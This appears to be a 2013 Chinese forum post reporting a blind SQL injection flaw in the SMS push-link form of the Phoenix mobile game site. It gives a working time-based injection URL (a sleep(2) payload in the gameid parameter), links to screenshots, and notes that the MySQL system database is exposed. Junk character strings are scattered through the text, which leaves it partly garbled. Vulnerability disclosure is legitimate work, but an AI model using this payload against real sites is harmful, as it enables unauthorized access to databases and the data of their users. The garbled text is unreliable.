简要描述:
, e$ c7 s2 q3 m, a+ t3 y凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。 C y {0 a; E: a* b
) c: f2 x, o4 _6 y! C6 C详细说明:
) @3 K+ T0 H; c6 L2 U存在SQL盲注url:5 \" A; E0 C) R. b8 F
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1/ E1 V% K$ D8 e" G9 B
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png$ ]$ W' y( g" a D; N
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png3 v0 J# Z9 X" s7 l: w/ ~" y
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
& V8 r- X" n3 j) O l' }
5 b5 F9 S9 }# N$ Q" Z4 A: `3 H1 N能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对